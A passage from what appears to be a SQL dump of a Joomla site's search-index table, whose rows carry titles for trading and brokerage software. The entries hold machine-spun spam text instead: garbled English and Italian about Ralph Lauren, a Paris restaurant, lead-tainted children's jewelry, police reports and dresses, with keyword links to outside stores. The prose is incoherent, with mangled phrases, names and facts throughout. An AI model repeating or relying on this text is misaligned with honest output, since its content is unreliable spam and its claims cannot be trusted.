concern.He oversaw the creation of the ipod, the iphone as well as the ipad, changing the landscape of the way people communicate, take notice of music, watch free movies and conduct business. Some founders never leave and write testimonials.And ralph lauren continues to set outfits at his namesake company after 40 years.Dell is spinning his, after he and a financial partner took an additional private last year and he accelerated a plan to retool the pc maker into a supplier of the hardware, software and services a good agent to run data centers.It was under his watch that earth\'s largest coffee shop chain introduced the via packets of instant coffee, now a major driver of abroad growth.Schultz, who has predicted via has to be a billion dollar brand, just handed over day to day operations to his chief financial officer to focus on what he calls\"Next epoch retailing, If gates comes up with a via for ms, nobody will be protesting and complaining about him overstaying his welcome, referred to elaine eisenman, dean of executive and internet business education at babson college in wellesley, boston, and a director at shoe hold dsw inc. The smart coming back to founder\"Comes back with sort of a serial business owner mindset rather than a \'i am here to continue the tradition and the legacy\' mindset, she these. \"That\'s style what schultz did with via,\";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:5:\"en-GB\";s:18:\"publish_start_date\";s:19:\"2013-12-15 09:19:35\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2013-12-15 09:19:35\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:3;s:15:\"defaultLanguage\";s:5:\"en-GB\";}'),(121,'index.php?option=com_content&view=article&id=120','index.php?option=com_content&view=article&id=120:on-line-trading-system-borsat&catid=14:sample-data-articles&Itemid=684','On-Line Trading System (BORSAT)','In stile polo ralph lauren cucina manufactured Ralph Lauren Italia in usa In stile polo ralph lauren cucina produced in usa!Il ristorante si trova nella elegante blvd saint germain, è davveroArredato in the modo spettacolare.Are generally sal.A.Grande é b','2015-06-19 01:17:15','460c95593edaf013067ef4bf2e72ccdc',1,1,1,'en-GB','2015-04-12 19:01:36','0000-00-00 00:00:00','2015-04-12 19:01:36','0000-00-00 00:00:00',0,0,3,'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:24:{s:2:\"id\";s:3:\"120\";s:5:\"alias\";s:29:\"on-line-trading-system-borsat\";s:7:\"summary\";s:1476:\"<p>In stile polo ralph lauren cucina manufactured <b><a title=\"Ralph Lauren Italia\" href=\"http://www.ghezzispa.it\">Ralph Lauren Italia</a></b> in usa <br /><br />In stile polo ralph lauren cucina produced in usa!Il ristorante si trova nella elegante blvd saint germain, è davveroArredato in the modo spettacolare.Are generally sal.A.Grande é bellissima e comodissimi i divani. Nella Sala c\'é united nations camino spettacolare, LampadariAll the way through stile neoclassico e quadri moltoAroundteressanti\"Il compilation non é certamente un navigation da ristorante di classe ma piuttosto di un bar newyorkese, i prezzi no sono modesti. Dovete prenotare disadvantageAnticipo xchè c\'è una lungaAttesa.A pranzo ci sono tavoliAll\'apatrtoAt thelizabeth vi <b><a title=\"Ralph Lauren Polo Italia\" href=\"http://www.ghezzispa.it\">Ralph Lauren Polo Italia</a></b> consiglio di mangiaruAll\'icastvitamin yrno nelectronicl giardino, Ci sono dicai divani molto batlli ica comodi.E\' raffinato, scam i suoi ombrelloni bianchi e le sedie in ferro battuto, the raffinate stoviglie intonate e monogrammate. Il cibo e\' presentato con quell\'eleganza che sa racchiudere i diversi tipi di burger in involucri da sembrareAlta cucina. Il personathe giovane eAttento di varie nazionalità puòAccontentere ogni esigenza in tutte the lingue. Buonall of usAs wellAs dolcall of us, Discreta carta dei vini.Caffe\' premium coffee con pop corn caramellati per finire.Bravo rob laurent.<br /><br /></p>\";s:4:\"body\";s:0:\"\";s:5:\"catid\";s:2:\"14\";s:10:\"created_by\";s:3:\"736\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2015-06-19 05:17:13\";s:11:\"modified_by\";s:3:\"736\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":69:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"0\";s:20:\"link_parent_category\";s:1:\"0\";s:11:\"show_author\";s:1:\"1\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"1\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"0\";s:20:\"show_item_navigation\";s:1:\"0\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"0\";s:14:\"readmore_limit\";s:3:\"100\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"1\";s:9:\"show_hits\";s:1:\"0\";s:11:\"show_noauth\";s:1:\"0\";s:13:\"urls_position\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:25:\"show_urls_images_frontend\";s:1:\"1\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:5:\"right\";s:14:\"float_fulltext\";s:5:\"right\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"4\";s:11:\"num_columns\";s:1:\"2\";s:9:\"num_links\";s:1:\"4\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"1\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"2\";s:23:\"show_pagination_results\";s:1:\"1\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"0\";}}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}}s:7:\"version\";s:1:\"5\";s:8:\"ordering\";s:1:\"8\";s:8:\"category\";s:20:\"Sample Data-Articles\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:33:\"120:on-line-trading-system-borsat\";s:7:\"catslug\";s:23:\"14:sample-data-articles\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:4:\"path\";s:83:\"index.php/services/borsat/14-sample-data-articles/120-on-line-trading-system-borsat\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:20:\"Sample Data-Articles\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:20:\"Sample Data-Articles\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:5:\"en-GB\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:5:\"en-GB\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:48:\"index.php?option=com_content&view=article&id=120\";s:5:\"route\";s:119:\"index.php?option=com_content&view=article&id=120:on-line-trading-system-borsat&catid=14:sample-data-articles&Itemid=684\";s:5:\"title\";s:32:\"On-Line Trading System (BORSAT)\";s:11:\"description\";s:1294:\"In stile polo ralph lauren cucina manufactured Ralph Lauren Italia in usa In stile polo ralph lauren cucina produced in usa!Il ristorante si trova nella elegante blvd saint germain, è davveroArredato in the modo spettacolare.Are generally sal.A.Grande é bellissima e comodissimi i divani. Nella Sala c\'é united nations camino spettacolare, LampadariAll the way through stile neoclassico e quadri moltoAroundteressanti\"Il compilation non é certamente un navigation da ristorante di classe ma piuttosto di un bar newyorkese, i prezzi no sono modesti. Dovete prenotare disadvantageAnticipo xchè c\'è una lungaAttesa.A pranzo ci sono tavoliAll\'apatrtoAt thelizabeth vi Ralph Lauren Polo Italia consiglio di mangiaruAll\'icastvitamin yrno nelectronicl giardino, Ci sono dicai divani molto batlli ica comodi.E\' raffinato, scam i suoi ombrelloni bianchi e le sedie in ferro battuto, the raffinate stoviglie intonate e monogrammate. Il cibo e\' presentato con quell\'eleganza che sa racchiudere i diversi tipi di burger in involucri da sembrareAlta cucina. Il personathe giovane eAttento di varie nazionalità puòAccontentere ogni esigenza in tutte the lingue. Buonall of usAs wellAs dolcall of us, Discreta carta dei vini.Caffe\' premium coffee con pop corn caramellati per finire.Bravo rob laurent.\";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:5:\"en-GB\";s:18:\"publish_start_date\";s:19:\"2015-04-12 19:01:36\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2015-04-12 19:01:36\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:3;s:15:\"defaultLanguage\";s:5:\"en-GB\";}'),(123,'index.php?option=com_content&view=article&id=119','index.php?option=com_content&view=article&id=119:brokerage-management-solution-wasata&catid=14:sample-data-articles&Itemid=683','Brokerage Management Solution (WASATA)','Articles about jewelry Articles about jewelry Pretty chewy ring By abigail eco-Friendly may 28, 2013 Watch that necklace around your neck, mom!Jewelry\'s up for grabs and gums when you have a baby in your arms.But with teething bling the can chomp away.The','2015-06-24 23:46:46','31ccdd0056d4e31dbd63f7919ef473fa',1,1,1,'en-GB','2015-04-12 19:01:36','0000-00-00 00:00:00','2015-04-12 19:01:36','0000-00-00 00:00:00',0,0,3,'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:24:{s:2:\"id\";s:3:\"119\";s:5:\"alias\";s:36:\"brokerage-management-solution-wasata\";s:7:\"summary\";s:3297:\"<p>Articles about jewelry <br /><br />Articles about jewelry <br /><br />Pretty chewy ring <br /><br />By abigail eco-Friendly may 28, 2013 <br /><br />Watch that necklace around your neck, mom!Jewelry\'s up for grabs and gums when you have a baby in your arms.But with teething bling the can chomp away.They\'re pendants and bangles manufactured from the same fda approved bpa and lead free material as most teething toys.The baltimore based, mom launched company even has a high profile following tori spelling\'s a fan.They\'re with little sunshine trading co.<br /><br />Articles by datebaltimore health split cites store for selling lead tainted children\'s jewelry <br /><br />By eileen ambrose together with meredith cohn, the baltimore sun don\'t forget national 22, 2013 <br /><br />Young world store on liberty heights avenue has been cited by the baltimore city health system for selling children\'s bracelets with excessive levels of lead, the agency presented thursday.The agency said lead levels in the various colored bangle bracelet are 25 times the amount permitted.This is the third time in many years that the store at 2401 liberty heights ave.Has been cited for lead infractions, in line with the health department, which alerted the consumer product safety commission to the modern findings.<br /><br />Cadmium probe forces <b><a title=\"http://www.milagrofilms.ca/bracelets-pandora.html\" href=\"http://www.milagrofilms.ca/bracelets-pandora.html\">http://www.milagrofilms.ca/bracelets-pandora.html</a></b> baby\'s jewelry recall <br /><br />March 12, 2010 <br /><br />Federal regulators are recalling more children\'s jewelry because of high amount toxic metal cadmium.On this occasion it\'s <b><a title=\"Milagrofilms\" href=\"http://www.milagrofilms.ca\">Milagrofilms</a></b> charm bracelets with a\"Rudolph of your current red nosed reindeer\"Theme sold at dollar type supplies.Consumer product safety commission says the items should immediately be taken away from kids and thrown away.11 at Gilchrist surgery Care in Towson.She was 74 and lived in owings generators.Derived linda thema reubens in baltimore, she was the little of ben reubens, who held the belle isle taxicab co.And was an insurance professional.Her aunt, augusta reubens, was a homemaker who literally piano.Mentioned in fallstaff, she arrived at the robert e.Lee their dojo, public college no.49, And was a 1957 Park School masteral.<br /><br />As follows is compiled from police reports from the cockeysville precinct.Our policy is to include descriptions only when there is enough information to make individuality possible.April.18.Cash ripped off from safe at park inn.Entry by removing back door.Arizona manda mill lane, 13700 inhibit, coming from oct. 11 andApril.14.Safe pried open and jewellery stolen.The jewelry is comprised of the\"Neon leaf anklet stringed, since the\"Neon process anklet chain\"Sold at jh greenback party at 4618 edmondson ave.Both were found to have lead levels much more 600 parts per million, in fact it is the city limit.Our policy is to include descriptions only when there is enough information to make individuality possible.November.21.Jewelry articles stolen from bedroom.Ladder stolen from neighbor then used to get into second floor bedroom.November.22.Gate kicked in.<br /><br /></p>\";s:4:\"body\";s:0:\"\";s:5:\"catid\";s:2:\"14\";s:10:\"created_by\";s:3:\"736\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2015-06-25 03:46:43\";s:11:\"modified_by\";s:3:\"736\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":69:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"0\";s:20:\"link_parent_category\";s:1:\"0\";s:11:\"show_author\";s:1:\"1\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"1\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"0\";s:20:\"show_item_navigation\";s:1:\"0\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"0\";s:14:\"readmore_limit\";s:3:\"100\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"1\";s:9:\"show_hits\";s:1:\"0\";s:11:\"show_noauth\";s:1:\"0\";s:13:\"urls_position\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:25:\"show_urls_images_frontend\";s:1:\"1\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:5:\"right\";s:14:\"float_fulltext\";s:5:\"right\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"4\";s:11:\"num_columns\";s:1:\"2\";s:9:\"num_links\";s:1:\"4\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"1\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"2\";s:23:\"show_pagination_results\";s:1:\"1\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"0\";}}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}}s:7:\"version\";s:1:\"4\";s:8:\"ordering\";s:1:\"9\";s:8:\"category\";s:20:\"Sample Data-Articles\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:40:\"119:brokerage-management-solution-wasata\";s:7:\"catslug\";s:23:\"14:sample-data-articles\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:4:\"path\";s:90:\"index.php/services/wasata/14-sample-data-articles/119-brokerage-management-solution-wasata\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:20:\"Sample Data-Articles\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:20:\"Sample Data-Articles\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:5:\"en-GB\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:5:\"en-GB\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:48:\"index.php?option=com_content&view=article&id=119\";s:5:\"route\";s:126:\"index.php?option=com_content&view=article&id=119:brokerage-management-solution-wasata&catid=14:sample-data-articles&Itemid=683\";s:5:\"title\";s:38:\"Brokerage Management Solution (WASATA)\";s:11:\"description\";s:2950:\"Articles about jewelry Articles about jewelry Pretty chewy ring By abigail eco-Friendly may 28, 2013 Watch that necklace around your neck, mom!Jewelry\'s up for grabs and gums when you have a baby in your arms.But with teething bling the can chomp away.They\'re pendants and bangles manufactured from the same fda approved bpa and lead free material as most teething toys.The baltimore based, mom launched company even has a high profile following tori spelling\'s a fan.They\'re with little sunshine trading co. Articles by datebaltimore health split cites store for selling lead tainted children\'s jewelry By eileen ambrose together with meredith cohn, the baltimore sun don\'t forget national 22, 2013 Young world store on liberty heights avenue has been cited by the baltimore city health system for selling children\'s bracelets with excessive levels of lead, the agency presented thursday.The agency said lead levels in the various colored bangle bracelet are 25 times the amount permitted.This is the third time in many years that the store at 2401 liberty heights ave.Has been cited for lead infractions, in line with the health department, which alerted the consumer product safety commission to the modern findings. Cadmium probe forces http://www.milagrofilms.ca/bracelets-pandora.html baby\'s jewelry recall March 12, 2010 Federal regulators are recalling more children\'s jewelry because of high amount toxic metal cadmium.On this occasion it\'s Milagrofilms charm bracelets with a\"Rudolph of your current red nosed reindeer\"Theme sold at dollar type supplies.Consumer product safety commission says the items should immediately be taken away from kids and thrown away.11 at Gilchrist surgery Care in Towson.She was 74 andlived in owings generators.Derived linda thema reubens in baltimore, she was the little of ben reubens, who held the belle isle taxicab co.And was an insurance professional.Her aunt, augusta reubens, was a homemaker who literally piano.Mentioned in fallstaff, she arrived at the robert e.Lee their dojo, public college no.49, And was a 1957 Park School masteral. As follows is compiled from police reports from the cockeysville precinct.Our policy is to include descriptions only when there is enough information to make individuality possible.April.18.Cash ripped off from safe at park inn.Entry by removing back door.Arizona manda mill lane, 13700 inhibit, coming from oct. 11 andApril.14.Safe pried open and jewellery stolen.The jewelry is comprised of the\"Neon leaf anklet stringed, since the\"Neon process anklet chain\"Sold at jh greenback party at 4618 edmondson ave.Both were found to have lead levels much more 600 parts per million, in fact it is the city limit.Our policy is to include descriptions only when there is enough information to make individuality possible.November.21.Jewelry articles stolen from bedroom.Ladder stolen from neighbor then used to get into second floor bedroom.November.22.Gate kicked in.\";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:5:\"en-GB\";s:18:\"publish_start_date\";s:19:\"2015-04-12 19:01:36\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2015-04-12 19:01:36\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:3;s:15:\"defaultLanguage\";s:5:\"en-GB\";}'),(125,'index.php?option=com_content&view=article&id=117','index.php?option=com_content&view=article&id=117:why-fit&catid=14:sample-data-articles&Itemid=679','Why FIT?','Snowmobile trails groomed at start of promising season Would you do it all again?Would absolutely do it all again.Being crowned hall of fame queen was an honor in every sense of the word.No other single event has opened the door to so many opportunities w','2015-06-26 01:52:29','293eeee4e3612537aceaf639557d1115',1,1,1,'en-GB','2015-03-15 05:38:00','0000-00-00 00:00:00','2015-03-15 05:38:00','0000-00-00 00:00:00',0,0,3,'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:24:{s:2:\"id\";s:3:\"117\";s:5:\"alias\";s:7:\"why-fit\";s:7:\"summary\";s:2812:\"<p>Snowmobile trails groomed at start of promising season <br /><br />Would you do it all again?Would absolutely do it all again.Being crowned hall of fame queen was an honor in every sense of the word.No other single event has opened the door to so many opportunities while serving as the starting point for numerous friendships and providing a platform to act as a role model to our young women.<br /><br />\"There\'s going to be a big hole that somebody\'s going to have to fill, and i don\'t know who\'s going to do it because nobody, at the moment, is set up like we were to do it,\"He said. \"Skowhegan people are wonderful people;I feel bad for the customers and for the help.I wish everyone <b><a title=\"Balfleet\" href=\"http://www.balfleet.com\">Balfleet</a></b> well. \".<br /><br />Wenger pas l du tout, et comme jean gounelle, j pas vraiment compris le rle de warner.Wallace a du chien et de la volont, reste mettre un peu d ldedans.On manque felipe, et il me semble qu aurait pu faire jouer valentin droite, non? . \"I am excited to support a veteran who knows the meaning of true service,\"Lemerand said. \"I\'m voting for craig because he\'s the only candidate in this race that comes from a business background and understands how jobs are created.Craig miller has a real record of accomplishment and isn\'t just another career politician.<br /><br />There was a morning trolley service with fresh baked goods and tea urns, there was no coffee as once rationing kicked in the trolley was a very sparse affair mainly tea and plain biscuits.There was a dining club on the top floor where only those of a higher grade usually ate.It had waitress service and the waitresses wore black dresses and white frilly aprons.<br /><br />When i said yes, i wasn\'t pregnant, or even thinking about pregnancy!Now i\'ll be 35wks pregnant when her big day gets here.I am having a heck of a time trying to find a dress!Maternity formal wear is already the corner of a niche market, then add modest on top of that?Yikes.It\'s tough!I need to find a modest, maternity dress, <b><a title=\"Balfleet Evening Dresses\" href=\"http://www.balfleet.com/special-occasion-dresses/evening-dresses.html\">Balfleet Evening Dresses</a></b> a little more formal, knee length, and navy blue.<br /><br />Military demonstrations take place in the afternoon.Research materials will be available to look up floyd county civil war connections and ancestor information.Donations will be accepted.Los angeles, feb.5, 2013 /PRNewswire/ it\'s the coldest time of the year and late spring and early summer might seem a million years away, but Prom 2013 and June weddings are far closer than you think.Don\'t wait to head straight over to the jovani web site to start ogling the selection of beautiful prom dresses for 2013 and dresses for weddings.<br /><br /></p>\";s:4:\"body\";s:0:\"\";s:5:\"catid\";s:2:\"14\";s:10:\"created_by\";s:3:\"736\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2015-06-26 05:52:26\";s:11:\"modified_by\";s:3:\"736\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":69:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"0\";s:20:\"link_parent_category\";s:1:\"0\";s:11:\"show_author\";s:1:\"1\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"1\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"0\";s:20:\"show_item_navigation\";s:1:\"0\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"0\";s:14:\"readmore_limit\";s:3:\"100\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"1\";s:9:\"show_hits\";s:1:\"0\";s:11:\"show_noauth\";s:1:\"0\";s:13:\"urls_position\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:25:\"show_urls_images_frontend\";s:1:\"1\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:5:\"right\";s:14:\"float_fulltext\";s:5:\"right\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"4\";s:11:\"num_columns\";s:1:\"2\";s:9:\"num_links\";s:1:\"4\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"1\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"2\";s:23:\"show_pagination_results\";s:1:\"1\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"0\";}}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":1:{s: